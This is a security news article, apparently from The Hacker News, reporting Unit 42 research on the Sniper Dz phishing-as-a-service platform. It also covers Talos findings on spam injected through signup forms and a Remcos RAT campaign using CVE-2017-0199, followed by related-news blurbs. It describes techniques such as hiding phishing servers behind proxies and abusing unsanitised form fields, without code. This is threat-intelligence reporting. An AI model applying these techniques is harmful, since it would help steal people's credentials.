Headline
Free Sniper Dz Phishing Tools Fuel 140,000+ Cyber Attacks Targeting User Credentials
More than 140,000 phishing websites have been found linked to a phishing-as-a-service (PhaaS) platform named Sniper Dz over the past year, indicating that it’s being used by a large number of cybercriminals to conduct credential theft. “For prospective phishers, Sniper Dz offers an online admin panel with a catalog of phishing pages,” Palo Alto Networks Unit 42 researchers Shehroze Farooqi,
More than 140,000 phishing websites have been found linked to a phishing-as-a-service (PhaaS) platform named Sniper Dz over the past year, indicating that it’s being used by a large number of cybercriminals to conduct credential theft.
“For prospective phishers, Sniper Dz offers an online admin panel with a catalog of phishing pages,” Palo Alto Networks Unit 42 researchers Shehroze Farooqi, Howard Tong, and Alex Starov said in a technical report.
“Phishers can either host these phishing pages on Sniper Dz-owned infrastructure or download Sniper Dz phishing templates to host on their own servers.”
Perhaps what makes it even more lucrative is that these services are provided for free. That said, the credentials harvested using the phishing sites are also exfiltrated to the operators of the PhaaS platform, a technique that Microsoft calls double theft.
PhaaS platforms have become an increasingly common way for aspiring threat actors to enter the world of cybercrime, allowing even those with little technical expertise to mount phishing attacks at scale.
Such phishing kits can be purchased off of Telegram, with dedicated channels and groups catering to each and every aspect of the attack chain, right from hosting services to sending phishing messages.
Sniper Dz is no exception in that the threat actors operate a Telegram channel with over 7,170 subscribers as of October 1, 2024. The channel was created on May 25, 2020.
Interestingly, a day after the Unit 42 report went live, the people behind the channel have enabled the auto-delete option to automatically clear all posts after one month. This likely suggests an attempt to cover up traces of their activity, although earlier messages remain intact in the chat history.
The PhaaS platform is accessible on the clearnet and requires signing up an account to “get your scams and hack tools,” according to the website’s home page.
A video uploaded to Vimeo in January 2021 shows that the service offers ready-to-use scam templates for various online sites like X, Facebook, Instagram, Skype, Yahoo, Netflix, Steam, Snapchat, and PayPal in English, Arabic, and French languages. The video has more than 67,000 views to date.
The Hacker News has also identified tutorial videos uploaded to YouTube that take viewers through the different steps required to download templates from Sniper Dz and set up fake landing pages for PUBG and Free Fire on legitimate platforms like Google Blogger.
However, it’s not clear if they have any connection to the developers of Sniper Dz, or if they are just customers of the service.
Sniper Dz comes with the ability to host phishing pages on its own infrastructure and provide bespoke links pointing to those pages. These sites are then hidden behind a legitimate proxy server (proxymesh[.]com) to prevent detection.
“The group behind Sniper Dz configures this proxy server to automatically load phishing content from its own server without direct communications,” the researchers said.
“This technique can help Sniper Dz to protect its backend servers, since the victim’s browser or a security crawler will see the proxy server as being responsible for loading the phishing payload.”
The other option for cybercriminals is to download phishing page templates offline as HTML files and host them on their own servers. Furthermore, Sniper Dz offers additional tools to convert phishing templates to the Blogger format that could then be hosted on Blogspot domains.
The stolen credentials are ultimately displayed on an admin panel that can be accessed by logging into the clearnet site. Unit 42 said it observed a surge in phishing activity using Sniper Dz, primarily targeting web users in the U.S., starting in July 2024.
“Sniper Dz phishing pages exfiltrate victim credentials and track them through a centralized infrastructure,” the researchers said. “This could be helping Sniper Dz collect victim credentials stolen by phishers who use their PhaaS platform.”
The development comes as Cisco Talos revealed that attackers are abusing web pages connected to backend SMTP infrastructure, such as account creation form pages and others that trigger an email back to the user, to bypass spam filters and distribute phishing emails.
These attacks take advantage of poor input validation and sanitization prevalent on these web forms to include malicious links and text. Other campaigns conduct credential stuffing attacks against mail servers of legitimate organizations so as to gain access to email accounts and send spam.
“Many websites allow users to sign up for an account and log in to access specific features or content,” Talos researcher Jaeson Schultz said. “Typically, upon successful user registration, an email is triggered back to the user to confirm the account.”
“In this case, the spammers have overloaded the name field with text and a link, which is unfortunately not validated or sanitized in any way. The resulting email back to the victim contains the spammer’s link.”
It also follows the discovery of a new email phishing campaign that leverages a seemingly harmless Microsoft Excel document to propagate a fileless variant of Remcos RAT by exploiting a known security flaw (CVE-2017-0199).
“Upon opening the [Excel] file, OLE objects are used to trigger the download and execution of a malicious HTA application,” Trellix researcher Trishaan Kalra said. “This HTA application subsequently launches a chain of PowerShell commands that culminate in the injection of a fileless Remcos RAT into a legitimate Windows process.”
Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.
Related news
SmokeLoader malware has resurfaced with enhanced capabilities and functionalities, targeting your personal data.
Windows users are at risk for full device takeover by an emerging malicious version of the Remcos remote admin tool, which is being used in an ongoing campaign exploiting a known remote code execution (RCE) vulnerability in Microsoft Office and WordPad.
This article explains the inner workings of the Remcos RAT, a dangerous malware that uses advanced techniques to…
Chinese-speaking users are the target of an ongoing campaign that distributes malware known as ValleyRAT. "ValleyRAT is a multi-stage malware that utilizes diverse techniques to monitor and control its victims and deploy arbitrary plugins to cause further damage," Fortinet FortiGuard Labs researchers Eduardo Altares and Joie Salvio said. "Another noteworthy characteristic of this malware is its
The nation-state espionage group known for attacking Pakistan has expanded its reach to targets in Egypt and Sri Lanka.
The nation-state threat actor known as SideWinder has been attributed to a new cyber espionage campaign targeting ports and maritime facilities in the Indian Ocean and Mediterranean Sea. The BlackBerry Research and Intelligence Team, which discovered the activity, said targets of the spear-phishing campaign include countries like Pakistan, Egypt, Sri Lanka, Bangladesh, Myanmar, Nepal, and the
Spanish speakers beware! A new campaign using the Agent Tesla RAT targets Spanish-speaking individuals. Learn how to protect…
Kim Jong Un's Swiss Army knife APT continues to spread its tendrils around the world, showing it's not intimidated by the researchers closing in.
The health, manufacturing, and energy sectors are the most vulnerable to ransomware.
A social engineering campaign leveraging job-themed lures is weaponizing a years-old remote code execution flaw in Microsoft Office to deploy Cobalt Strike beacons on compromised hosts. "The payload discovered is a leaked version of a Cobalt Strike beacon," Cisco Talos researchers Chetan Raghuprasad and Vanja Svajcer said in a new analysis published Wednesday. "The beacon configuration contains
By Chetan Raghuprasad and Vanja Svajcer. Cisco Talos discovered a malicious campaign in August 2022 delivering Cobalt Strike beacons that could be used in later, follow-on attacks. Lure themes in the phishing documents in this campaign are related to the job details of a government organization in the United States and a trade union in New Zealand. The attack involves a multistage and modular infection chain with fileless, malicious scripts. Cisco Talos recently discovered a malicious campaign with a modularised attack technique to deliver Cobalt Strike beacons on infected endpoints. The initial vector of this attack is a phishing email with a malicious Microsoft Word document attachment containing an exploit that attempts to exploit the vulnerability CVE-2017-0199, a remote code execution issue in Microsoft Office. If a victim opens the maldoc, it downloads a malicious Word document template hosted on an attacker-controlled Bitbucket repository. Talos discovered two attack met...
The most heavily targeted flaw last quarter was a remote code execution vulnerability in Microsoft Office that was disclosed and patched four years ago.